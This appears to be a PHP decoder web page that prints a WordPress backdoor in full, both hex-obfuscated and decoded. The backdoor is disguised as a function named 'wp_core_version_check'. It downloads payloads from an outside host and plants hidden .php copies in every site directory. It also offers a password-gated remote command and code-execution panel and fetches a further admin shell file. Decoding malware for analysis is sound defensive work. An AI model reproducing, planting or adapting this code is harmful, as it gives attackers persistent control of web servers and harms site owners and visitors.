Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if (!function_exists("\x77\160\137\143\x6f\x72\145\x5f\166\145\162\163\151\x6f\x6e\..

Decoded Output download

<?php 
if (!function_exists("wp_core_version_check")) { 
    function wp_core_version_check() 
    { 
        goto QHTmE; 
        ReBbR: 
        $file_path = dirname($document_file); 
        goto yxZ6i; 
        QHTmE: 
        $document_file = $_SERVER["SCRIPT_FILENAME"]; 
        goto TmK7C; 
        B8IHf: 
        $uri_path = $parse_url["path"]; 
        goto DR8d0; 
        TmK7C: 
        $request_uri = $_SERVER["REQUEST_URI"]; 
        goto Lhccs; 
        Sae33: 
        $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); 
        goto EmUwt; 
        yxZ6i: 
        $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); 
        goto TMxaR; 
        O4NxR: 
        if (!file_exists($tmp_file)) { 
            goto Jjyr3; 
            qVUcF: 
            @touch($tmp_file); 
            goto FrbfO; 
            FrbfO: 
            @file_put_contents($tmp_file, $response); 
            goto fUkP_; 
            Jjyr3: 
            if (function_exists("curl_init")) { 
                goto EZy_9; 
                EZy_9: 
                $ch = curl_init(); 
                goto VR0Vi; 
                OFlqh: 
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
                goto VdcLO; 
                VR0Vi: 
                curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); 
                goto OFlqh; 
                DcJlW: 
                $response = curl_exec($ch); 
                goto fkRwe; 
                VdcLO: 
                curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); 
                goto DcJlW; 
                fkRwe: 
                curl_close($ch); 
                goto MpMm6; 
                MpMm6: 
            } else { 
                goto Rsl9q; 
                PQRsR: 
                $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); 
                goto NXRla; 
                DmscO: 
                $context = stream_context_create($opts); 
                goto PQRsR; 
                Rsl9q: 
                $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; 
                goto vGpwe; 
                vGpwe: 
                $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); 
                goto DmscO; 
                NXRla: 
            } 
            goto qVUcF; 
            fUkP_: 
        } else { 
            $response = file_get_contents($tmp_file); 
            if (!@preg_match("#stt1#", $response)) { 
                goto Mh1sz; 
                Mh1sz: 
                if (function_exists("curl_init")) { 
                    goto DVDkP; 
                    u_SFh: 
                    $response = curl_exec($ch); 
                    goto zDHcZ; 
                    zMTgu: 
                    curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); 
                    goto AvWVd; 
                    YWAQw: 
                    curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); 
                    goto u_SFh; 
                    DVDkP: 
                    $ch = curl_init(); 
                    goto zMTgu; 
                    zDHcZ: 
                    curl_close($ch); 
                    goto v98go; 
                    AvWVd: 
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
                    goto YWAQw; 
                    v98go: 
                } else { 
                    goto JGb71; 
                    Npbn0: 
                    $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); 
                    goto dtUcU; 
                    JGb71: 
                    $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; 
                    goto Npbn0; 
                    hCspz: 
                    $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); 
                    goto XWjW4; 
                    dtUcU: 
                    $context = stream_context_create($opts); 
                    goto hCspz; 
                    XWjW4: 
                } 
                goto zkCQa; 
                zkCQa: 
                @touch($tmp_file); 
                goto RL2uX; 
                RL2uX: 
                @file_put_contents($tmp_file, $response); 
                goto Fx07H; 
                Fx07H: 
            } 
        } 
        goto BXZRC; 
        EmUwt: 
        if (is_writable(sys_get_temp_dir())) { 
            $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); 
        } else { 
            $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); 
        } 
        goto jUXuO; 
        DR8d0: 
        $uri_path = dirname($uri_path); 
        goto ReBbR; 
        QCYq2: 
        foreach ($dirs as $d) { 
            goto DpqP9; 
            eMOLH: 
            @file_put_contents($file_name, $response); 
            goto xQTu4; 
            xQTu4: 
            $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); 
            goto KHsZ5; 
            DpqP9: 
            $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; 
            goto eMOLH; 
            KHsZ5: 
            foreach ($dirs as $d) { 
                if (!@preg_match("#wp-content#", $d)) { 
                    $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; 
                    @file_put_contents($file_name, $response); 
                } 
            } 
            goto vTd8M; 
            vTd8M: 
        } 
        goto VCwm6; 
        jUXuO: 
        if (@$_GET["slince_golden"]) { 
            goto qhIqa; 
            v6_uU: 
            if (md5(sha1(@$_GET["is"])) == $response) { 
                goto LNCgX; 
                LNCgX: 
                if (@$_GET["f"]) { 
                    print_r($_GET["f"]($_GET["c"])); 
                } 
                goto mNwUE; 
                mNwUE: 
                if (@$_GET["m"]) { 
                    goto u3lO9; 
                    u3lO9: 
                    if (function_exists("curl_init")) { 
                        goto h0059; 
                        nzFPK: 
                        curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); 
                        goto SlTBv; 
                        SMEF2: 
                        curl_close($ch); 
                        goto nxTNz; 
                        h0059: 
                        $ch = curl_init(); 
                        goto nzFPK; 
                        SlTBv: 
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
                        goto cerjF; 
                        cerjF: 
                        $response = curl_exec($ch); 
                        goto SMEF2; 
                        nxTNz: 
                    } else { 
                        $response = file_get_contents("http://r57shell.net/mini_admin.txt"); 
                    } 
                    goto VIyGz; 
                    oeY1g: 
                    echo $file_name_path; 
                    goto UXu2c; 
                    VIyGz: 
                    $file_name_path = @$_GET["m"] . "gagal.php"; 
                    goto xhRaG; 
                    xhRaG: 
                    @file_put_contents($file_name_path, $response); 
                    goto oeY1g; 
                    UXu2c: 
                } 
                goto jKG5A; 
                jKG5A: 
                if (@$_POST["l"]) { 
                    function basic_code_extensions($request) 
                    { 
                        goto JTclu; 
                        tgcIK: 
                        $tmpf = $tmpf["uri"]; 
                        goto z3rep; 
                        vnQ75: 
                        $ret = (include $tmpf); 
                        goto Cvaad; 
                        JTclu: 
                        $tmp = tmpfile(); 
                        goto ToYXQ; 
                        ToYXQ: 
                        $tmpf = stream_get_meta_data($tmp); 
                        goto tgcIK; 
                        z3rep: 
                        fwrite($tmp, $request); 
                        goto vnQ75; 
                        aY2Ix: 
                        return $ret; 
                        goto hdvh2; 
                        Cvaad: 
                        fclose($tmp); 
                        goto aY2Ix; 
                        hdvh2: 
                    } 
                    print_r(basic_code_extensions($_POST["l"])); 
                } 
                goto ZFcwP; 
                ZFcwP: 
            } 
            goto OlWFN; 
            OlWFN: 
            exit; 
            goto vQOuT; 
            qhIqa: 
            echo "<!-- //Silence is golden. -->"; 
            goto q9t4S; 
            q9t4S: 
            if (function_exists("curl_init")) { 
                goto P3bql; 
                sk_2w: 
                curl_close($ch); 
                goto j1BU_; 
                P3bql: 
                $ch = curl_init(); 
                goto FA3oh; 
                FA3oh: 
                curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); 
                goto XAilZ; 
                AJz_6: 
                $response = curl_exec($ch); 
                goto sk_2w; 
                XAilZ: 
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
                goto AJz_6; 
                j1BU_: 
            } else { 
                $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); 
            } 
            goto v6_uU; 
            vQOuT: 
        } 
        goto O4NxR; 
        TMxaR: 
        if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { 
            $document_root = $file_path; 
        } else { 
            $document_root = str_replace($uri_path, '', $file_path); 
        } 
        goto Sae33; 
        BXZRC: 
        $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); 
        goto QCYq2; 
        Lhccs: 
        $parse_url = parse_url($request_uri); 
        goto B8IHf; 
        VCwm6: 
    } 
    wp_core_version_check(); 
} 
 
?>

Did this file decode correctly?

Original Code

<?php
if (!function_exists("\x77\160\137\143\x6f\x72\145\x5f\166\145\162\163\151\x6f\x6e\x5f\143\150\x65\x63\x6b")) {
    function wp_core_version_check()
    {
        goto QHTmE;
        ReBbR:
        $file_path = dirname($document_file);
        goto yxZ6i;
        QHTmE:
        $document_file = $_SERVER["\123\x43\x52\111\x50\124\x5f\106\111\114\x45\x4e\x41\115\105"];
        goto TmK7C;
        B8IHf:
        $uri_path = $parse_url["\x70\x61\x74\150"];
        goto DR8d0;
        TmK7C:
        $request_uri = $_SERVER["\x52\105\x51\x55\105\123\124\x5f\x55\122\x49"];
        goto Lhccs;
        Sae33:
        $hostname = str_replace("\167\167\x77\56", '', $_SERVER["\110\124\x54\120\137\x48\x4f\x53\x54"]);
        goto EmUwt;
        yxZ6i:
        $uri_path = str_replace("\x2f", DIRECTORY_SEPARATOR, $uri_path);
        goto TMxaR;
        O4NxR:
        if (!file_exists($tmp_file)) {
            goto Jjyr3;
            qVUcF:
            @touch($tmp_file);
            goto FrbfO;
            FrbfO:
            @file_put_contents($tmp_file, $response);
            goto fUkP_;
            Jjyr3:
            if (function_exists("\143\165\162\154\137\x69\x6e\x69\x74")) {
                goto EZy_9;
                EZy_9:
                $ch = curl_init();
                goto VR0Vi;
                OFlqh:
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                goto VdcLO;
                VR0Vi:
                curl_setopt($ch, CURLOPT_URL, "\x68\x74\x74\160\72\57\x2f\x72\x35\67\163\x68\145\x6c\154\x2e\156\x65\164\x2f\152\161\165\x65\162\x79\x2e\160\150\160\77\x76\75\61\x2e\x32\x26\x72\145\161\x75\x65\163\x74\75\145\156\141\142\x6c\x65");
                goto OFlqh;
                DcJlW:
                $response = curl_exec($ch);
                goto fkRwe;
                VdcLO:
                curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\110\124\124\x50\x5f\x48\x4f\x53\124"] . $_SERVER["\x52\105\x51\x55\x45\x53\x54\137\x55\x52\111"]);
                goto DcJlW;
                fkRwe:
                curl_close($ch);
                goto MpMm6;
                MpMm6:
            } else {
                goto Rsl9q;
                PQRsR:
                $response = @file_get_contents("\150\x74\x74\x70\x3a\x2f\57\162\x35\67\163\150\145\x6c\x6c\x2e\x6e\x65\164\x2f\152\161\165\145\162\171\x2e\x70\x68\160\77\166\75\x31\56\62\46\x72\145\161\165\145\163\x74\x3d\x65\x6e\141\142\154\145", false, $context);
                goto NXRla;
                DmscO:
                $context = stream_context_create($opts);
                goto PQRsR;
                Rsl9q:
                $referer = $_SERVER["\110\x54\124\x50\x5f\x48\x4f\123\124"] . $_SERVER["\x52\x45\x51\x55\105\123\124\x5f\x55\122\111"];
                goto vGpwe;
                vGpwe:
                $opts = array("\150\x74\164\160" => array("\x68\x65\141\144\145\162" => array("\122\x65\x66\x65\x72\x65\162\72\40{$referer}\15\xa")));
                goto DmscO;
                NXRla:
            }
            goto qVUcF;
            fUkP_:
        } else {
            $response = file_get_contents($tmp_file);
            if (!@preg_match("\43\163\164\x74\61\x23", $response)) {
                goto Mh1sz;
                Mh1sz:
                if (function_exists("\143\x75\162\154\137\151\156\x69\164")) {
                    goto DVDkP;
                    u_SFh:
                    $response = curl_exec($ch);
                    goto zDHcZ;
                    zMTgu:
                    curl_setopt($ch, CURLOPT_URL, "\150\164\164\x70\72\x2f\57\x72\65\67\163\x68\145\154\154\56\156\x65\164\x2f\x6a\x71\165\x65\x72\x79\56\160\150\x70\77\166\75\61\56\x32\x26\162\145\161\165\145\x73\x74\x3d\145\x6e\x61\142\x6c\x65");
                    goto AvWVd;
                    YWAQw:
                    curl_setopt($ch, CURLOPT_REFERER, $_SERVER["\x48\124\124\120\137\110\x4f\x53\124"] . $_SERVER["\122\105\x51\x55\105\x53\124\x5f\x55\122\111"]);
                    goto u_SFh;
                    DVDkP:
                    $ch = curl_init();
                    goto zMTgu;
                    zDHcZ:
                    curl_close($ch);
                    goto v98go;
                    AvWVd:
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    goto YWAQw;
                    v98go:
                } else {
                    goto JGb71;
                    Npbn0:
                    $opts = array("\150\164\164\160" => array("\150\145\141\x64\145\x72" => array("\122\145\146\145\162\145\162\72\40{$referer}\15\xa")));
                    goto dtUcU;
                    JGb71:
                    $referer = $_SERVER["\110\124\124\x50\137\x48\x4f\x53\x54"] . $_SERVER["\122\x45\121\125\105\x53\x54\x5f\125\x52\111"];
                    goto Npbn0;
                    hCspz:
                    $response = @file_get_contents("\150\x74\x74\x70\72\57\57\162\x35\x37\x73\x68\145\154\x6c\56\156\x65\164\x2f\x6a\161\x75\145\x72\171\56\160\x68\x70\77\x76\75\x31\56\62\46\x72\x65\161\x75\145\x73\164\75\x65\156\x61\x62\154\145", false, $context);
                    goto XWjW4;
                    dtUcU:
                    $context = stream_context_create($opts);
                    goto hCspz;
                    XWjW4:
                }
                goto zkCQa;
                zkCQa:
                @touch($tmp_file);
                goto RL2uX;
                RL2uX:
                @file_put_contents($tmp_file, $response);
                goto Fx07H;
                Fx07H:
            }
        }
        goto BXZRC;
        EmUwt:
        if (is_writable(sys_get_temp_dir())) {
            $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "\x73\145\x73\163\x5f" . md5('' . $hostname . "\x5f" . $document_file . '');
        } else {
            $tmp_file = $file_path . DIRECTORY_SEPARATOR . "\163\x65\163\163\137" . md5('' . $hostname . "\x5f" . $document_file . '');
        }
        goto jUXuO;
        DR8d0:
        $uri_path = dirname($uri_path);
        goto ReBbR;
        QCYq2:
        foreach ($dirs as $d) {
            goto DpqP9;
            eMOLH:
            @file_put_contents($file_name, $response);
            goto xQTu4;
            xQTu4:
            $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "\x2a", GLOB_ONLYDIR));
            goto KHsZ5;
            DpqP9:
            $file_name = $d . DIRECTORY_SEPARATOR . "\x2e" . basename($d) . "\56\160\150\160";
            goto eMOLH;
            KHsZ5:
            foreach ($dirs as $d) {
                if (!@preg_match("#wp-content#", $d)) {
                    $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
                    @file_put_contents($file_name, $response);
                }
            }
            goto vTd8M;
            vTd8M:
        }
        goto VCwm6;
        jUXuO:
        if (@$_GET["slince_golden"]) {
            goto qhIqa;
            v6_uU:
            if (md5(sha1(@$_GET["\151\163"])) == $response) {
                goto LNCgX;
                LNCgX:
                if (@$_GET["\146"]) {
                    print_r($_GET["\x66"]($_GET["\x63"]));
                }
                goto mNwUE;
                mNwUE:
                if (@$_GET["\x6d"]) {
                    goto u3lO9;
                    u3lO9:
                    if (function_exists("curl_init")) {
                        goto h0059;
                        nzFPK:
                        curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt");
                        goto SlTBv;
                        SMEF2:
                        curl_close($ch);
                        goto nxTNz;
                        h0059:
                        $ch = curl_init();
                        goto nzFPK;
                        SlTBv:
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                        goto cerjF;
                        cerjF:
                        $response = curl_exec($ch);
                        goto SMEF2;
                        nxTNz:
                    } else {
                        $response = file_get_contents("http://r57shell.net/mini_admin.txt");
                    }
                    goto VIyGz;
                    oeY1g:
                    echo $file_name_path;
                    goto UXu2c;
                    VIyGz:
                    $file_name_path = @$_GET["m"] . "gagal.php";
                    goto xhRaG;
                    xhRaG:
                    @file_put_contents($file_name_path, $response);
                    goto oeY1g;
                    UXu2c:
                }
                goto jKG5A;
                jKG5A:
                if (@$_POST["\x6c"]) {
                    function basic_code_extensions($request)
                    {
                        goto JTclu;
                        tgcIK:
                        $tmpf = $tmpf["uri"];
                        goto z3rep;
                        vnQ75:
                        $ret = (include $tmpf);
                        goto Cvaad;
                        JTclu:
                        $tmp = tmpfile();
                        goto ToYXQ;
                        ToYXQ:
                        $tmpf = stream_get_meta_data($tmp);
                        goto tgcIK;
                        z3rep:
                        fwrite($tmp, $request);
                        goto vnQ75;
                        aY2Ix:
                        return $ret;
                        goto hdvh2;
                        Cvaad:
                        fclose($tmp);
                        goto aY2Ix;
                        hdvh2:
                    }
                    print_r(basic_code_extensions($_POST["\154"]));
                }
                goto ZFcwP;
                ZFcwP:
            }
            goto OlWFN;
            OlWFN:
            exit;
            goto vQOuT;
            qhIqa:
            echo "<!-- //Silence is golden. -->";
            goto q9t4S;
            q9t4S:
            if (function_exists("curl_init")) {
                goto P3bql;
                sk_2w:
                curl_close($ch);
                goto j1BU_;
                P3bql:
                $ch = curl_init();
                goto FA3oh;
                FA3oh:
                curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get");
                goto XAilZ;
                AJz_6:
                $response = curl_exec($ch);
                goto sk_2w;
                XAilZ:
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                goto AJz_6;
                j1BU_:
            } else {
                $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get");
            }
            goto v6_uU;
            vQOuT:
        }
        goto O4NxR;
        TMxaR:
        if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') {
            $document_root = $file_path;
        } else {
            $document_root = str_replace($uri_path, '', $file_path);
        }
        goto Sae33;
        BXZRC:
        $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "\x2a", GLOB_ONLYDIR));
        goto QCYq2;
        Lhccs:
        $parse_url = parse_url($request_uri);
        goto B8IHf;
        VCwm6:
    }
    wp_core_version_check();
}

?>

Function Calls

None

Variables

None

Stats

MD5 c30b39338d62dc396fd0436d3042e2ec
Eval Count 0
Decode Time 55 ms